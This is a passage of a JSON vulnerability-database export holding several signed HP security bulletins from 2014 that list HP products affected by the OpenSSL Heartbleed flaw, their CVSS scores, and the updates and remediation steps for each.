(GNU/Linux)\r\n\r\niEYEARECAAYFAlNfxzMACgkQ4B86/C0qfVnxzgCfYGUWPnj9fMIXFN3Tt1d05Yhw\r\n9koAoN6wTZ3HPpXfoJnXOJwBa+A563SI\r\n=mvDg\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30496", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30496", "title": "[security bulletin] HPSBMU03020 rev.2 - HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272594\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04272594\r\nVersion: 1\r\n\r\nHPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer\r\nSoftware running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Virtual\r\nConnect Firmware Smart Components installer software running OpenSSL. This is\r\nthe OpenSSL vulnerability known as "Heartbleed" which could be exploited\r\nremotely resulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101549\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Virtual Connect Firmware Smart Components installer impacted products and\r\nversions\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU) 1.9.0 for Linux\r\nand Windows\r\n\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Virtual Connect\r\nFirmware Smart Components Installer software in the following updates and/or\r\nHP Security Bulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.10B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalS\r\ntate%3Didx%253D%257CswItem%253DMTX_da108a1f80f644f79d3dcc8b98%257CswEnvOID%25\r\n3D4168%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddrive\r\nrDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.20B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalS\r\ntate%3Didx%253D%257CswItem%253DMTX_6c1bcbd3c5ae485cb936818973%257CswEnvOID%25\r\n3D4168%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddrive\r\nrDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU)\r\n HPSBMU03023\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04264271\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgGgACgkQ4B86/C0qfVkpbACg9DSqL62MTf5m+QNI1XWC6nfs\r\nqBQAoP7ssN3H3Bu8IacvYEILcwWUNn3E\r\n=tCt+\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-02T00:00:00", "published": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30525", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30525", "title": "[security bulletin] HPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04250814\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04250814\r\nVersion: 1\r\n\r\nHPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-17\r\nLast Updated: 2014-04-17\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101517)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nServer Automation, 10.00, 10.01\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843314/binary/SA_Alert_\r\nHeartbleed_Vulnerability.pdf\r\n\r\nHP recommends following the Server Automation remediation guidelines and\r\ncompleting the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 17 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNP3uIACgkQ4B86/C0qfVm3kQCgrhhP0/att4M8wopB81/dAlzX\r\nBXMAoOMhgToWBG9l+JKMLuOaORt3BhE1\r\n=J4SK\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30474", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30474", "title": "[security bulletin] HPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260385\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260385\r\nVersion: 1\r\n\r\nHPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with WMI Mapper for HP\r\nSystems Insight Manager running OpenSSL. This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101523\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for WMI Mapper for HP\r\nSystems Insight Manager to resolve the vulnerability.\r\n\r\nWMI Mapper 7.2.3 (to be used for 7.2, 7.2.1 and 7.2.2 upgrades)\r\nWMI Mapper 7.3.2 (to be used for 7.3 and 7.3.1 upgrades)\r\n\r\nThe software updates are available here:\r\n\r\nSoftware Version\r\n Location\r\n\r\nWMI Mapper 7.2.3\r\n http://www.hp.com/swpublishing/MTX-9ef95a0fdf044f7aa5f7a09445\r\n\r\nWMI Mapper 7.3.2\r\n http://www.hp.com/swpublishing/MTX-4503970ccd6841dca639ddbcee\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW4IMACgkQ4B86/C0qfVmF8ACaAvPqjqJ+M0rI8rH+l1chmwY4\r\np/gAoIxRd6xqTFRbjlGtAFTc2jY01H1K\r\n=q4pb\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30506", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30506", "title": "[security bulletin] HPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236102\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236102\r\nVersion: 1\r\n\r\nHPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB\r\nBrowser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner,\r\nPerformance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-11\r\nLast Updated: 2014-04-11\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101499)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Product\r\n Impacted HP Product Versions\r\n Notes\r\n\r\nHP Service Manager\r\n v9.32, v9.33\r\n\r\nHP Asset Manager\r\n v9.40, v9.40 CSC\r\n\r\nHP UCMDB Browser\r\n\r\n APR enabled on Tomcat includes an affected OpenSSL version\r\n\r\nHP CIT (ConnectIT)\r\n v9.52, v9.53\r\n\r\nHP Executive Scorecard\r\n v9.40, v9.41\r\n\r\nHP Server Automation\r\n v10.00, v10.01\r\n\r\nHP Diagnostics\r\n v9.23, v9.23 IP1\r\n\r\nHP LoadRunner\r\n v11.52, v12.0\r\n Controller/load generator communication channel\r\n\r\nHP Performance Center\r\n v11.52, v12.0\r\n Controller/load generator communication channel\r\n\r\nImpacted Versions table\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP Software is working to address this vulnerability for all affected product\r\nversions. HP Software will release product specific security bulletins for\r\neach impacted product. Each bulletin will include a patch and/or mitigation\r\nguideline. HP will update this bulletin with references to security bulletins\r\nfor each product in the impacted versions table.\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNHUmgACgkQ4B86/C0qfVnJ0QCdHsWxy4zAHbs7fFx/+al24D/5\r\nhFYAn0AzeojK1hXP9Ky8v+kFeeglSrvP\r\n=ciWU\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30471", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30471", "title": "[security bulletin] HPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, Performance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04240206\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04240206\r\nVersion: 1\r\n\r\nHPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP XP P9500 Disk\r\nArray running OpenSSL.This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101506\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP XP P9500 Disk Array OSS 70-06-00/00 and 70-06-01/00 when running Apache\r\n2.2.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP XP P9500 Disk Array. This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nThe two versions of Apache available in OSS 70-06-00/00 and 70-06-01/00 are:\r\n\r\nApache 2.2.10 (with OpenSSL 0.9.8o) which is not impacted by CVE-2014-0160\r\nApache 2.2.24 (with OpenSSL 1.0.1e) which is impacted by CVE-2014-0160\r\n\r\nUntil a new version is available, keep the SVP(s) on an array on the earlier\r\nversion of Apache available from the OSS image (version 2.2.10)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNOSEACgkQ4B86/C0qfVl7IwCcCAFossT9cI/G1w8Zjt125fWa\r\nwwQAnR+wDpUBjcU/REah/pNV80/+VNeR\r\n=Do3J\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30478", 